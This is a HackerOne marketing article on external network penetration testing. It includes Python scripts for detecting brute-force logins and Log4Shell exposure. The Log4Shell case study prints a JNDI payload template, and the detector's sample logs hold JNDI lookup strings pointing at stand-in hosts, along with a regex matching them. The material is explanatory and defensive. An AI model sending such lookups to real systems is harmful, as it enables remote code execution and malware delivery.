External Network Penetration Testing and Best Practices

Paul De Baldo V
Senior Technical Engagement Manager

The risk of a cyberattack against your organization is constant. Thousands of threat actors, including those backed by nation-states and belonging to ransomware gangs, are incessantly searching for vulnerabilities in public-facing assets.

Assets such as web applications, email servers, remote access services, firewalls, VPNs, and APIs are directly accessible from the Internet, making them easy targets for this persistent barrage of malicious network traffic.

The resiliency of your organization’s perimeter defenses is the determining factor in preventing unauthorized access to sensitive data and systems. If this perimeter is breached, cybercriminals can establish persistent access to the system and remain undetected indefinitely.

An external network penetration test provides a security assessment that simulates the real-world remote threats your organization is exposed to. In contrast to an internal network penetration test, little to no information about, or initial access into, the target system is granted: external network pentests are conducted using a black box methodology. This approach hardens your organization's attack surface by identifying vulnerabilities so they can be addressed before they are taken advantage of by others with malicious intent.

HackerOne offers a methodology-driven penetration testing (pentesting) solution delivered via a Pentest as a Service (PTaaS) model. This approach connects organizations with a heavily vetted cohort drawn from a global ethical hacker community for comprehensive, end-to-end pentesting.

Testing Methodologies

HackerOne's testing methodologies are grounded in the principles of the PTES, OSSTMM, NIST SP 800-115, and CREST, and can be tailored to various assessment types, including external systems. Our methodology is continuously evolving to ensure comprehensive coverage for each pentesting engagement. This approach stems from:

  • Consultations with both internal and external industry experts.
  • Leveraging and adhering to recognized industry standards.
  • Gleaning insights from a vast array of global customer programs, spanning both time-bound and ongoing engagements.
  • Detailed analysis of millions of vulnerability reports we receive through our platform.

Threats are constantly evolving, so our methodology can't remain stagnant. HackerOne’s Delivery team, including experienced Technical Engagement Managers (TEMs), constantly refines and adapts it based on feedback and real-world experience, delivering unparalleled security assurance.

Common External Vulnerabilities

Weak Authentication Mechanisms

The absence of defensive measures such as Multi-Factor Authentication (MFA), rate limiting, and credential complexity requirements provides threat actors with reliable attack vectors for compromising a system.

Exploitation techniques such as dictionary and brute force attacks can be used to issue a massive number of authentication requests with the objective of guessing valid credentials. These attacks can be carried out using lists of commonly used passwords or custom scripts to increase the likelihood of success.

Even if the aforementioned security mechanisms are in place, they can be improperly implemented leading to vulnerabilities in their processing logic. Time-based authentication tokens or the reuse of tokens from a rotating pool can result in MFA bypasses. Insufficient client fingerprinting techniques can render rate limiting protections useless. Flawed validation or sanitization checks that do not account for encoded characters or concatenated values can lead to credential requirements being circumvented.

Failures can also occur in cryptography, allowing threat actors to create counterfeit session tokens.

Certain vendor services and software may even use a set of default credentials that are only intended to be used for the initial configuration process. These default credentials are usually tied to administrative accounts with elevated permissions. Official documentation or user manuals are publicly available online, meaning if these credentials are not changed they can be easily discovered and used by attackers to gain system access.
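The detection side of the credential-guessing problem described above, as an added example written for this article (it is not HackerOne's tooling). The script parses a constructed authentication log in an assumed `<timestamp> <client_ip> <username> <OK|FAIL>` format and flags any source that exceeds a threshold of failed logins inside a sliding window; the addresses, account names and thresholds are made up. It also lists the distinct accounts each source tried, which separates a single user retrying a mistyped password from a spray across many accounts, and it shows the edge case where a slow guessing pattern stays under a short window:

```python
"""Flag credential-guessing bursts in authentication logs.

Added example, not HackerOne's code. Assumes a constructed log format of
'<ISO-8601 timestamp> <client_ip> <username> <OK|FAIL>' per line; the
addresses, users and thresholds are made up for illustration.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample lines (not real traffic):
#   203.0.113.7  - six failures across six accounts inside ten seconds (spray)
#   198.51.100.9 - a user who mistypes twice and then logs in successfully
#   192.0.2.33   - about one failure per minute, which a 60-second window misses
AUTH_LOG = """\
2024-03-01T10:00:01Z 203.0.113.7 alice FAIL
2024-03-01T10:00:03Z 203.0.113.7 bob FAIL
2024-03-01T10:00:05Z 203.0.113.7 carol FAIL
2024-03-01T10:00:07Z 203.0.113.7 dave FAIL
2024-03-01T10:00:09Z 203.0.113.7 erin FAIL
2024-03-01T10:00:11Z 203.0.113.7 frank FAIL
2024-03-01T10:00:12Z 198.51.100.9 alice FAIL
2024-03-01T10:00:40Z 198.51.100.9 alice FAIL
2024-03-01T10:00:50Z 198.51.100.9 alice OK
2024-03-01T10:05:00Z 192.0.2.33 mallory FAIL
2024-03-01T10:05:30Z 192.0.2.33 mallory FAIL
2024-03-01T10:06:30Z 192.0.2.33 mallory FAIL
2024-03-01T10:07:30Z 192.0.2.33 mallory FAIL
2024-03-01T10:08:30Z 192.0.2.33 mallory FAIL
2024-03-01T10:09:30Z 192.0.2.33 mallory FAIL
"""


def parse_line(line):
    """Split one log line into (timestamp, client_ip, username, result)."""
    ts, ip, user, result = line.split()
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), ip, user, result


def detect_bursts(log_text, threshold=5, window_seconds=60):
    """Return {client_ip: {"failures": n, "users": [...]}} for every source
    with more than `threshold` failed logins inside a `window_seconds`
    sliding window. `users` lists the distinct accounts attempted."""
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)   # ip -> timestamps of failures still in window
    tried = defaultdict(set)      # ip -> usernames seen in failed attempts
    alerts = {}
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, ip, user, result = parse_line(line)
        if result != "FAIL":
            continue
        q = recent[ip]
        q.append(ts)
        tried[ip].add(user)
        while q and ts - q[0] > window:   # drop failures older than the window
            q.popleft()
        if len(q) > threshold:
            alerts[ip] = {"failures": len(q), "users": sorted(tried[ip])}
    return alerts


if __name__ == "__main__":
    for ip, info in detect_bursts(AUTH_LOG).items():
        print(f"{ip}: {info['failures']} failures across {len(info['users'])} accounts")
    # The slow pattern from 192.0.2.33 only surfaces with a wider window:
    print(detect_bursts(AUTH_LOG, window_seconds=600))
```

With the default 60-second window only 203.0.113.7 is reported; 192.0.2.33 is caught only when the window is widened to ten minutes. That is the same weakness the article attributes to rate limiting that keys on a single client attribute: a detector keyed only on source address also misses guessing spread across many sources, so in practice the same counter should be kept per target account as well.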

Open Ports and Exposed Services

Each unnecessary network port and service exposed to the Internet increases the attack surface of your organization. Modern scanning tools are capable of scanning tens of thousands of ports in a matter of minutes, allowing threat actors to quickly enumerate the services unprotected by firewall security rules and accepting remote connections. Attackers and security companies alike are constantly scanning every IP address on the internet for open ports and vulnerable services.

Internet-facing data storage services such as MySQL and shared file access services like FTP can result in sensitive data theft, while unauthorized access to services that provide direct system access, such as Telnet, Secure Shell (SSH), and Remote Desktop Protocol (RDP), can lead to full machine compromise, particularly if the service is misconfigured or vulnerable to a publicly available exploit.

Additionally, asset management is one of the most critical and challenging parts of a cybersecurity program. Shadow IT, including cloud resources and Internet-connected systems, needs to be identified before it can be protected. Shadow IT systems are often set up by employees who do not understand basic cybersecurity practices or how to properly protect these systems from attackers. Shadow IT resources are prime targets because many lack basic security measures, and attackers may be able to compromise them to gain access to sensitive data or the internal network.

Unpatched Hardware and Software

When security vulnerabilities are identified in software and devices, vendors or maintainers will issue updated versions or patches to resolve these issues. Failing to update to the latest release can leave operating systems, extensions, dependencies, applications, or devices like routers vulnerable to publicly known threats. This is especially dangerous as these vulnerabilities often have proof-of-concept exploits available online.

If an asset or component unintentionally discloses its exact versioning through a verbose error message or exposed information page, attacks can be carried out using simple search engine or database queries to discover potential weaknesses. As mentioned above, attackers are constantly scanning every IP address on the internet for outdated and vulnerable services.

Even the third-party code packages, libraries, and modules that your software relies on could contain security vulnerabilities. These dependencies can rely on dependencies themselves, creating a complex chain of modular code with each link potentially introducing vulnerabilities. Dependencies can also be purposefully sabotaged with malware through dependency confusion and package hijacking attacks. The contagious reach of these supply chain security issues can be massive, potentially affecting millions depending on the popularity of the dependency.

External Network Testing Best Practices

Careful Scoping

Defining a scope that aligns with the business objectives and concerns of your organization is essential to a successful pentest. To ensure a comprehensive assessment, it's recommended to set a broad scope that allows pentesters to navigate across your entire asset inventory, just as real threat actors will.

However, with limited resources and time, engagements can be tailored to target the most critical areas. HackerOne evaluates your assets to accurately determine the optimal pentest conditions and provides a customized quote tailored to your specific pentest requirements.

Download the Pre-Pentest Checklist to address crucial questions before your next pentest.

Skills-Based Tester Matching

While traditional consultancies may also advertise external network testing services, they usually source their own in-house researchers with limited expertise. However, in order to accurately test your systems against realistic attack scenarios, you need to match the diversity of skills exhibited by the thousands of threat actors and cybercriminals across the globe.

HackerOne Pentest, delivered through a Pentest as a Service (PTaaS) model, provides access to a global community of elite, vetted security researchers with specialized skills. By tracking each researcher's skill set and certifications, HackerOne ensures the most suitable specialists are matched for each engagement. This tailored approach results in the discovery of high and critical severity findings that often elude more general approaches, delivering the detailed attention required.

With HackerOne's community-driven PTaaS model, customers receive versatile, high-quality results, uniquely aligned with the specific assets and technology stacks present in their external networks.

Case Study: Log4Shell

In 2021, a security vulnerability was discovered in Apache’s Log4J 2 framework. The vulnerability, named Log4Shell (CVE-2021-44228), allows for remote code execution (RCE) on any host using Log4J versions up to and including 2.14.1.

Available as open-source software, Log4J is an extremely popular library that records system or application activity. Creating this ledger of activity is referred to as “logging” and is vital to understanding how the system is performing. Rather than write code to facilitate logging from scratch, developers can use the pre-written code of Log4J in their Java products instead.

The vulnerable versions write unrestricted user input into the logs. This can be abused by sending payloads that the logging library interprets and executes as a Java Naming and Directory Interface (JNDI) lookup. As a result, RCE is achieved by injecting a JNDI lookup that fetches malware from an attacker-controlled server, which the target then automatically executes.

The ease with which this attack is carried out contributed to its critical severity rating. For instance, the following payload could simply be added to an HTTP request or chat message, instructing the target to download malware using the Lightweight Directory Access Protocol (LDAP):

${jndi:ldap://<host>:<port>/<path>}

Once this vulnerability became public knowledge, scans to detect it and exploitation attempts surged. Log4Shell was exploited to install cryptocurrency miners and infect hosts with ransomware. Due to the ubiquitous use of Log4J, across millions of systems worldwide, the Log4Shell vulnerability is still an issue today and will continue to be for years to come.
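Two defender-side checks for the case study above, as an added example written for this article (not HackerOne's or the Apache project's code). The first serves the "Unpatched Hardware and Software" section as well: it compares a disclosed Log4J 2 version string against the affected range the article names (2.x up to and including 2.14.1). The second scans constructed web access log lines for the literal `${jndi:<scheme>://` lookup form shown above and extracts the scheme and host for triage. The version strings, log format and addresses are assumptions made up for the example:

```python
"""Log4Shell (CVE-2021-44228) exposure checks from the defender's side.

Added example, not HackerOne's or Apache's code. Assumptions: the affected
range is the 2.x line up to and including 2.14.1 as the article states; the
access log format and every address below are constructed samples.
"""
import re

LAST_VULNERABLE = (2, 14, 1)   # inclusive upper bound named in the article


def parse_version(version):
    """'2.14.1' -> (2, 14, 1). Pre-release suffixes such as '2.0-beta9' are
    dropped, and missing components are padded with zeros."""
    core = version.split("-")[0]
    parts = [int(p) for p in core.split(".") if p.isdigit()]
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts[:3])


def is_vulnerable_version(version):
    """True for any Log4J 2 release at or below 2.14.1."""
    v = parse_version(version)
    return v[0] == 2 and v <= LAST_VULNERABLE


# Matches the plain lookup form shown in the article and captures the scheme
# and the host the victim would be told to contact.
JNDI_RE = re.compile(r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^/:}]+)",
                     re.IGNORECASE)

# Constructed access log lines (not real traffic); line 4 mentions "jndi" in a
# harmless query string and must not be flagged.
ACCESS_LOG = """\
10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 "Mozilla/5.0"
10.0.0.6 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 "${jndi:ldap://198.51.100.23:1389/a}"
10.0.0.7 - - [10/Dec/2021:12:00:03 +0000] "GET /?x=${jndi:rmi://203.0.113.9:1099/obj} HTTP/1.1" 404 "curl/7.79"
10.0.0.8 - - [10/Dec/2021:12:00:04 +0000] "GET /search?q=jndi HTTP/1.1" 200 "Mozilla/5.0"
"""


def find_jndi_lookups(log_text):
    """Return one dict per JNDI lookup found: line number, scheme and host."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        for m in JNDI_RE.finditer(line):
            hits.append({"line": lineno,
                         "scheme": m["scheme"].lower(),
                         "host": m["host"]})
    return hits


if __name__ == "__main__":
    for v in ("2.14.1", "2.0-beta9", "2.15.0", "2.17.1"):
        print(f"log4j {v}: {'VULNERABLE' if is_vulnerable_version(v) else 'ok'}")
    for hit in find_jndi_lookups(ACCESS_LOG):
        print(f"line {hit['line']}: {hit['scheme']} lookup to {hit['host']}")
```

The version check applies only the bound the article gives; later Apache releases also backported the fix to older branches (2.12.2 and 2.3.1) for older Java runtimes, so an inventory check should be run against the vendor's own advisory rather than this single cut-off. The log check catches only the literal form shown in the article; traffic in the wild also carried encoded and nested variants, so treat it as a triage filter rather than a complete detector, and use the extracted host to confirm whether any outbound LDAP or RMI connection actually followed.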

Why HackerOne Is The Best Option For External Network Pentests

By choosing HackerOne as your partner in pentesting, your organization can fully benefit from the community-driven PTaaS model. The HackerOne Platform simplifies pentest requests, asset onboarding, and researcher enlistment, making the process swift and efficient.

Our community of security researchers brings the expertise needed to thoroughly audit your external networks for vulnerabilities. You will extend your attack surface coverage and be able to address vulnerabilities arising from a variety of technology stacks. With rapid setup, continuous monitoring, and prompt retesting of fixes, HackerOne safeguards your external network assets in an ever-changing threat landscape.